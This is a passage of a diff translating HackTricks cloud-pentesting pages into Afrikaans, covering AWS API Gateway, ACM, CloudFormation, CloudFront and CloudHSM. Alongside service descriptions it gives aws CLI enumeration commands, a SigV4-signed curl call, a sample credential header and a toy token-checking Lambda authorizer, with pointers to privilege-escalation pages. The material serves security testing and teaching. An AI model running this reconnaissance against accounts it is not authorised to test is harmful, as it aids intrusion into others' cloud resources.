Works with the following: Lambda, HTTP, AWS Services. -- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. -- **REST API Private**: Create a REST API that is only accessible from within a VPC. +- **HTTP API**: Bou lae-latensie en koste-effektiewe REST API's met ingeboude funksies soos OIDC en OAuth2, en inheemse CORS-ondersteuning. Werk met die volgende: Lambda, HTTP agtergronde. +- **WebSocket API**: Bou 'n WebSocket API met volgehoue verbindings vir regte tyd gebruiksgevalle soos klets toepassings of dashboards. Werk met die volgende: Lambda, HTTP, AWS Dienste. +- **REST API**: Ontwikkel 'n REST API waar jy volledige beheer oor die versoek en antwoord het, saam met API bestuur vermoĂ«ns. Werk met die volgende: Lambda, HTTP, AWS Dienste. +- **REST API Privaat**: Skep 'n REST API wat slegs vanaf binne 'n VPC toeganklik is. -### API Gateway Main Components +### API Gateway Hoofkomponente -1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. -2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. 
For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. - - The stage is indicated at the beggining of the URL of the API Gateway endpoint. -3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. -4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. - - In order to make effect the API needs to be **deployed again after** the resource policy is modified. +1. **Hulpbronne**: In API Gateway is hulpbronne die komponente wat **die struktuur van jou API vorm**. Hulle verteenwoordig **die verskillende paaie of eindpunte** van jou API en ooreen met die verskillende aksies wat jou API ondersteun. 'n Hulpbron is elke metode (bv. GET, POST, PUT, DELETE) **binne elke pad** (/, of /users, of /user/{id}). +2. **Fases**: Fases in API Gateway verteenwoordig **verskillende weergawes of omgewings** van jou API, soos ontwikkeling, staging, of produksie. 
Jy kan fases gebruik om **meervoudige weergawes van jou API gelyktydig te bestuur en te ontplooi**, wat jou toelaat om nuwe funksies of foutoplossings te toets sonder om die produksie-omgewing te beĂŻnvloed. Fases ondersteun ook **fase veranderlikes**, wat sleutel-waarde pare is wat gebruik kan word om die gedrag van jou API op grond van die huidige fase te konfigureer. Byvoorbeeld, jy kan fase veranderlikes gebruik om API versoeke na verskillende Lambda funksies of ander agtergrond dienste te lei, afhangende van die fase. +- Die fase word aan die begin van die URL van die API Gateway eindpunt aangedui. +3. **Outoriseerders**: Outoriseerders in API Gateway is verantwoordelik vir **die beheer van toegang tot jou API** deur die identiteit van die oproeper te verifieer voordat die versoek voortgaan. Jy kan **AWS Lambda funksies** as pasgemaakte outoriseerders gebruik, wat jou toelaat om jou eie autentisering en outorisering logika te implementeer. Wanneer 'n versoek inkom, stuur API Gateway die versoek se outoriseringstoken na die Lambda outoriseerder, wat die token verwerk en 'n IAM-beleid teruggee wat bepaal watter aksies die oproeper mag uitvoer. API Gateway ondersteun ook **ingeboude outoriseerders**, soos **AWS Identiteit en Toegang Bestuur (IAM)** en **Amazon Cognito**. +4. **Hulpbronbeleid**: 'n Hulpbronbeleid in API Gateway is 'n JSON-dokument wat **die toestemmings vir toegang tot jou API definieer**. Dit is soortgelyk aan 'n IAM-beleid, maar spesifiek aangepas vir API Gateway. Jy kan 'n hulpbronbeleid gebruik om te beheer wie jou API kan toegang, watter metodes hulle kan aanroep, en vanaf watter IP adresse of VPC's hulle kan aansluit. **Hulpbronbeleide kan in kombinasie met outoriseerders gebruik word** om fyngegradeerde toegangbeheer vir jou API te bied. +- Om effektief te wees, moet die API **weer ontplooi word nadat** die hulpbronbeleid gewysig is. 
### Logging -By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**. +Standaard is **CloudWatch Logs** **af**, **Toegang Logging** is **af**, en **X-Ray opsporing** is ook **af**. -### Enumeration +### Enumerasie > [!TIP] -> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** +> Let daarop dat in beide AWS API's om hulpbronne te enumereer (**`apigateway`** en **`apigatewayv2`**) die enigste toestemming wat jy nodig het en die enigste lees toestemming wat gegee kan word is **`apigateway:GET`**, met dit kan jy **alles enumereer.** {{#tabs }} {{#tab name="apigateway" }} - ```bash # Generic info aws apigateway get-account @@ -78,11 +77,9 @@ aws apigateway get-usage-plan-key --usage-plan-id --key-id ###Already consumed aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 ``` - {{#endtab }} {{#tab name="apigatewayv2" }} - ```bash # Generic info aws apigatewayv2 get-domain-names @@ -124,49 +121,43 @@ aws apigatewayv2 get-models --api-id ## Call API https://.execute-api..amazonaws.com// ``` - {{#endtab }} {{#endtabs }} -## Different Authorizations to access API Gateway endpoints +## Verskillende Owerhede om toegang tot API Gateway eindpunte te verkry -### Resource Policy +### Hulpbronbeleid -It's possible to use resource policies to define who could call the API endpoints.\ -In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. +Dit is moontlik om hulpbronbeleide te gebruik om te definieer wie die API eindpunte kan bel.\ +In die volgende voorbeeld kan jy sien dat die **aangegeven IP nie kan bel nie** die eindpunt `/resource_policy` via GET.
-### IAM Authorizer +### IAM Owerhede -It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it. +Dit is moontlik om te stel dat 'n metode binne 'n pad (n hulpbron) IAM-sertifisering benodig om dit te bel.
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization. - -One easy way to generate the expected token by the application is to use **curl**. +Wanneer dit gestel is, sal jy die fout `{"message":"Missing Authentication Token"}` ontvang wanneer jy probeer om die eindpunt te bereik sonder enige owerheid. +Een maklike manier om die verwagte token deur die toepassing te genereer, is om **curl** te gebruik. ```bash $ curl -X https://.execute-api..amazonaws.com// --user : --aws-sigv4 "aws:amz::execute-api" ``` - -Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. +Nog 'n manier is om die **`Authorization`** tipe **`AWS Signature`** binne **Postman** te gebruik.
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. - -Both methods will generate an **Authorization** **header** such as: +Stel die accessKey en die SecretKey van die rekening wat jy wil gebruik in, en jy kan nou teen die API-eindpunt autentiseer. +Albei metodes sal 'n **Authorization** **header** genereer soos: ``` AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2 ``` +Let op dat in ander gevalle die **Authorizer** dalk **sleg gekodeer** is en net **enigiets** binne die **Authorization header** sal **toelaat om die versteekte inhoud** te sien. -Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**. - -### Request Signing Using Python - +### Versoekondertekening met Python ```python pip install requests @@ -193,86 +184,83 @@ response = requests.get(url, auth=awsauth) print(response.text) ``` - ### Custom Lambda Authorizer -It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\ -You can set each resource method that will be using the authoriser. +Dit is moontlik om 'n lambda te gebruik wat op 'n gegewe token gebaseer is en **'n IAM-beleid** sal **teruggee wat aandui of die gebruiker **gemagtig is om die API-eindpunt** aan te roep.\ +Jy kan elke hulpbronmetode instel wat die outeur gaan gebruik.
Lambda Authorizer Code Example - ```python import json def lambda_handler(event, context): - token = event['authorizationToken'] - method_arn = event['methodArn'] +token = event['authorizationToken'] +method_arn = event['methodArn'] - if not token: - return { - 'statusCode': 401, - 'body': 'Unauthorized' - } +if not token: +return { +'statusCode': 401, +'body': 'Unauthorized' +} - try: - # Replace this with your own token validation logic - if token == "your-secret-token": - return generate_policy('user', 'Allow', method_arn) - else: - return generate_policy('user', 'Deny', method_arn) - except Exception as e: - print(e) - return { - 'statusCode': 500, - 'body': 'Internal Server Error' - } +try: +# Replace this with your own token validation logic +if token == "your-secret-token": +return generate_policy('user', 'Allow', method_arn) +else: +return generate_policy('user', 'Deny', method_arn) +except Exception as e: +print(e) +return { +'statusCode': 500, +'body': 'Internal Server Error' +} def generate_policy(principal_id, effect, resource): - policy = { - 'principalId': principal_id, - 'policyDocument': { - 'Version': '2012-10-17', - 'Statement': [ - { - 'Action': 'execute-api:Invoke', - 'Effect': effect, - 'Resource': resource - } - ] - } - } - return policy +policy = { +'principalId': principal_id, +'policyDocument': { +'Version': '2012-10-17', +'Statement': [ +{ +'Action': 'execute-api:Invoke', +'Effect': effect, +'Resource': resource +} +] +} +} +return policy ``` -
-Call it with something like: +Noem dit met iets soos:
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 
> [!WARNING] -> Depending on the Lambda code, this authorization might be vulnerable +> Afhangende van die Lambda-kode, mag hierdie toestemming kwesbaar wees -Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` +Let daarop dat as 'n **weieringsbeleid gegenereer en teruggestuur word**, die fout wat deur API Gateway teruggestuur word is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` -This way you could **identify this authorization** being in place. +Op hierdie manier kan jy **identifiseer dat hierdie toestemming** in plek is. -### Required API Key +### Vereiste API Sleutel -It's possible to set API endpoints that **require a valid API key** to contact it. +Dit is moontlik om API-eindpunte in te stel wat **'n geldige API-sleutel vereis** om dit te kontak.
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). +Dit is moontlik om API-sleutels in die API Gateway-portaal te genereer en selfs in te stel hoeveel dit gebruik kan word (in terme van versoeke per sekonde en in terme van versoeke per maand). -To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: +Om 'n API-sleutel te laat werk, moet jy dit by 'n **Gebruik Plan** voeg, hierdie gebruiksplan moet by die **API Stadium** gevoeg word en die geassosieerde API-stadium moet 'n **metode-beperking** geconfigureer hĂȘ vir die **eindpunt** wat die API-sleutel vereis:
-## Unauthenticated Access +## Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md @@ -284,20 +272,16 @@ To make an API key work, you need to add it to a **Usage Plan**, this usage plan ../aws-privilege-escalation/aws-apigateway-privesc.md {{#endref}} -## Post Exploitation +## Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-api-gateway-post-exploitation.md {{#endref}} -## Persistence +## Volharding {{#ref}} ../aws-persistence/aws-api-gateway-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index 0f3da9d50..7264b65ae 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md 
@@ -2,18 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. +**AWS Certificate Manager (ACM)** word aangebied as 'n diens wat daarop gemik is om die **verskaffing, bestuur en implementering van SSL/TLS sertifikate** vir AWS dienste en interne hulpbronne te vereenvoudig. Die noodsaaklikheid vir handmatige prosesse, soos die aankoop, opgelaai, en sertifikaat hernuwing, word **verwyder** deur ACM. Dit stel gebruikers in staat om doeltreffend sertifikate aan te vra en te implementeer op verskeie AWS hulpbronne, insluitend **Elastic Load Balancers, Amazon CloudFront verspreidings, en API's op API Gateway**. -A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. +'n Sleutelkenmerk van ACM is die **outomatiese hernuwing van sertifikate**, wat die bestuurslas aansienlik verminder. 
Verder ondersteun ACM die skepping en gesentraliseerde bestuur van **privaat sertifikate vir interne gebruik**. Alhoewel SSL/TLS sertifikate vir geĂŻntegreerde AWS dienste soos Elastic Load Balancing, Amazon CloudFront, en Amazon API Gateway gratis deur ACM aangebied word, is gebruikers verantwoordelik vir die koste verbonde aan die AWS hulpbronne wat deur hul toepassings gebruik word en 'n maandelikse fooi vir elke **privaat Certificate Authority (CA)** en private sertifikate wat buite geĂŻntegreerde ACM dienste gebruik word. -**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. +**AWS Private Certificate Authority** word aangebied as 'n **bestuurde private CA diens**, wat ACM se vermoĂ«ns verbeter deur sertifikaatbestuur uit te brei om privaat sertifikate in te sluit. Hierdie private sertifikate is noodsaaklik vir die autentisering van hulpbronne binne 'n organisasie. -## Enumeration +## Enumerasie ### ACM - ```bash # List certificates aws acm list-certificates @@ -27,9 +26,7 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce # Account configuration aws acm get-account-configuration ``` - ### PCM - ```bash # List CAs aws acm-pca list-certificate-authorities @@ -49,7 +46,6 @@ aws acm-pca get-certificate-authority-csr --certificate-authority-arn # Get CA Policy (if any) aws acm-pca get-policy --resource-arn ``` - ## Privesc TODO @@ -59,7 +55,3 @@ TODO TODO {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md index 66539b87d..baf41d0c6 100644 
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -4,10 +4,9 @@ ## CloudFormation -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. +AWS CloudFormation is 'n diens wat ontwerp is om die **bestuur van AWS hulpbronne te vereenvoudig**. Dit stel gebruikers in staat om meer op hul toepassings wat in AWS loop te fokus deur **die tyd wat aan hulpbronbestuur bestee word te minimaliseer**. Die kernkenmerk van hierdie diens is die **sjabloon**—'n beskrywende model van die gewenste AWS hulpbronne. Sodra hierdie sjabloon verskaf is, is CloudFormation verantwoordelik vir die **verskaffing en konfigurasie** van die gespesifiseerde hulpbronne. Hierdie outomatisering fasiliteer 'n meer doeltreffende en foutvrye bestuur van AWS infrastruktuur. ### Enumeration - ```bash # Stacks aws cloudformation list-stacks @@ -30,10 +29,9 @@ aws cloudformation list-stack-instances --stack-set-name aws cloudformation list-stack-set-operations --stack-set-name aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id ``` - ### Privesc -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **cloudformation-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-cloudformation-privesc/ 
@@ -41,14 +39,13 @@ In the following page you can check how to **abuse cloudformation permissions to ### Post-Exploitation -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation +Kyk vir **geheime** of sensitiewe inligting in die **sjabloon, parameters & uitvoer** van elke CloudFormation ## Codestar -AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). +AWS CodeStar is 'n diens vir die skep, bestuur en werk met sagteware-ontwikkelingsprojekte op AWS. Jy kan vinnig toepassings ontwikkel, bou en ontplooi op AWS met 'n AWS CodeStar-projek. 'n AWS CodeStar-projek skep en **integreer AWS-dienste** vir jou projekontwikkelingshulpmiddelketting. Afhangende van jou keuse van AWS CodeStar-projeksjabloon, kan daardie hulpmiddelketting bronbeheer, bou, ontplooiing, virtuele bedieners of serverlose hulpbronne, en meer insluit. AWS CodeStar **bestuur ook die toestemmings wat benodig word vir projekgebruikers** (genoem spanlede). ### Enumeration - ```bash # Get projects information aws codestar list-projects 
@@ -56,13 +53,12 @@ aws codestar describe-project --id aws codestar list-resources --project-id aws codestar list-team-members --project-id - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn +aws codestar list-user-profiles +aws codestar describe-user-profile --user-arn ``` - ### Privesc -In the following page you can check how to **abuse codestar permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **codestar-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-codestar-privesc/ @@ -73,7 +69,3 @@ In the following page you can check how to **abuse codestar permissions to escal - [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md index 75613cdb4..d166d2439 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md 
@@ -4,20 +4,19 @@ ## CloudFront -CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. +CloudFront is AWS se **inhoudsverspreidingsnetwerk wat die verspreiding** van jou statiese en dinamiese inhoud deur sy wĂȘreldwye netwerk van randlokasies versnel. Wanneer jy 'n versoek inhoud gebruik wat jy deur Amazon CloudFront huisves, word die versoek na die naaste randlokasie gerouteer wat die laagste latensie bied om die beste prestasie te lewer. Wanneer **CloudFront-toeganglogs** geaktiveer is, kan jy die versoek van elke gebruiker wat toegang tot jou webwerf en verspreiding versoek, opneem. Soos met S3-toeganglogs, word hierdie logs ook **op Amazon S3 gestoor vir duursame en volgehoue berging**. Daar is geen koste verbonde aan die aktivering van logging self nie, egter, aangesien die logs in S3 gestoor word, sal jy koste hĂȘ vir die berging wat deur S3 gebruik word. -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. 
Again, depending on the size of these log files this delivery can take **between one and 24 hours**. +Die loglĂȘers vang data oor 'n tydperk en afhangende van die hoeveelheid versoeke wat deur Amazon CloudFront vir daardie verspreiding ontvang word, sal dit afhang van die hoeveelheid loglĂȘers wat gegenereer word. Dit is belangrik om te weet dat hierdie loglĂȘers nie op S3 geskep of geskryf word nie. S3 is bloot waar hulle afgelewer word sodra die loglĂȘer vol is. **Amazon CloudFront hou hierdie logs totdat hulle gereed is om aan S3 afgelewer te word**. Weer, afhangende van die grootte van hierdie loglĂȘers kan hierdie aflewering **tussen een en 24 uur** neem. -**By default cookie logging is disabled** but you can enable it. +**Standaard is koekielogging gedeaktiveer** maar jy kan dit aktiveer. ### Functions -You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). +Jy kan funksies in CloudFront skep. Hierdie funksies sal sy **eindpunt in cloudfront** gedefinieer hĂȘ en sal 'n verklaarde **NodeJS-kode** uitvoer. Hierdie kode sal binne 'n **sandbox** op 'n masjien wat onder 'n AWS bestuurde masjien loop, uitgevoer word (jy sal 'n sandbox-bypass nodig hĂȘ om te kan ontsnap na die onderliggende OS). -As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. +Aangesien die funksies nie in die gebruikers se AWS-rekening uitgevoer word nie, is daar geen IAM-rol aangeheg nie, so geen direkte privesc is moontlik deur hierdie kenmerk te misbruik nie. ### Enumeration - ```bash aws cloudfront list-distributions aws cloudfront get-distribution --id # Just get 1 
@@ -28,21 +27,16 @@ aws cloudfront get-function --name TestFunction function_code.js aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" ``` - -## Unauthenticated Access +## Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md {{#endref}} -## Post Exploitation +## Na Exploitatie {{#ref}} ../aws-post-exploitation/aws-cloudfront-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md index 55216fa7e..f715ce723 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md 
@@ -4,68 +4,62 @@ ## HSM - Hardware Security Module -Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. +Cloud HSM is 'n FIPS 140 vlak twee gevalideerde **hardeware toestel** vir veilige kriptografiese sleutelberging (let daarop dat CloudHSM 'n hardeware toestel is, dit is nie 'n gevirtualiseerde diens nie). Dit is 'n SafeNetLuna 7000 toestel met 5.3.13 vooraf gelaai. Daar is twee firmware weergawes en watter een jy kies, hang regtig af van jou presiese behoeftes. Een is vir FIPS 140-2 nakoming en daar was 'n nuwer weergawe wat gebruik kan word. -The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads +Die ongewone kenmerk van CloudHSM is dat dit 'n fisiese toestel is, en dus is dit **nie gedeel met ander kliĂ«nte nie**, of soos dit algemeen genoem word, multi-tenant. Dit is 'n toegewyde enkel-tenant toestel wat eksklusief beskikbaar gestel word vir jou werklading. -Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be. +Tipies is 'n toestel binne 15 minute beskikbaar, mits daar kapasiteit is, maar in sommige sones mag dit nie wees nie. -Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. 
+Aangesien dit 'n fisiese toestel is wat aan jou toegewy is, **word die sleutels op die toestel gestoor**. Sleutels moet of **na 'n ander toestel gerepliceer word**, geback-up word na offline berging, of uitgevoer word na 'n standby toestel. **Hierdie toestel is nie ondersteun** deur S3 of enige ander diens by AWS soos KMS nie. -In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. +In **CloudHSM** moet jy **die diens self skaal**. Jy moet genoeg CloudHSM toestelle voorsien om te hanteer wat jou versleuteling behoeftes is gebaseer op die versleuteling algoritmes wat jy gekies het om te implementeer vir jou oplossing.\ +Sleutelbestuurdiens skaal deur AWS en skaal outomaties op aanvraag, so soos jou gebruik groei, kan die aantal CloudHSM toestelle wat benodig word ook groei. Hou dit in gedagte terwyl jy jou oplossing skaal en as jou oplossing outo-skaal, maak seker jou maksimum skaal is in ag geneem met genoeg CloudHSM toestelle om die oplossing te bedien. -Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. 
+Net soos met skaal, **is prestasie aan jou met CloudHSM**. Prestasie wissel gebaseer op watter versleuteling algoritme gebruik word en hoe gereeld jy toegang moet verkry of die sleutels moet onttrek om die data te versleuteling. Sleutelbestuurdiens prestasie word deur Amazon hanteer en skaal outomaties soos die vraag dit vereis. CloudHSM se prestasie word bereik deur meer toestelle by te voeg en as jy meer prestasie benodig, voeg jy of toestelle by of verander die versleuteling metode na die algoritme wat vinniger is. -If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. +As jou oplossing **multi-streek** is, moet jy verskeie **CloudHSM toestelle in die tweede streek byvoeg en die kruis-streek konnektiwiteit uitwerk met 'n private VPN-verbinding** of 'n metode om te verseker dat die verkeer altyd beskerm is tussen die toestel op elke laag van die verbinding. As jy 'n multi-streek oplossing het, moet jy dink oor hoe om **sleutels te repliseer en addisionele CloudHSM toestelle op te stel in die streke waar jy werk**. Jy kan baie vinnig in 'n scenario beland waar jy ses of agt toestelle oor verskeie streke versprei het, wat volle redundans van jou versleuteling sleutels moontlik maak. -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. 
In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. +**CloudHSM** is 'n ondernemingsklas diens vir beveiligde sleutelberging en kan gebruik word as 'n **wortel van vertroue vir 'n onderneming**. Dit kan private sleutels in PKI en sertifikaatowerheid sleutels in X509 implementasies stoor. Benewens simmetriese sleutels wat in simmetriese algoritmes soos AES gebruik word, **stoor KMS en fisies beskerm slegs simmetriese sleutels (kan nie as 'n sertifikaatowerheid optree nie)**, so as jy PKI en CA sleutels moet stoor, kan 'n CloudHSM of twee of drie jou oplossing wees. -**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ -Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. +**CloudHSM is aansienlik duurder as Sleutelbestuurdiens**. CloudHSM is 'n hardeware toestel, so jy het vaste koste om die CloudHSM toestel te voorsien, dan is daar 'n uurlikse koste om die toestel te laat loop. 
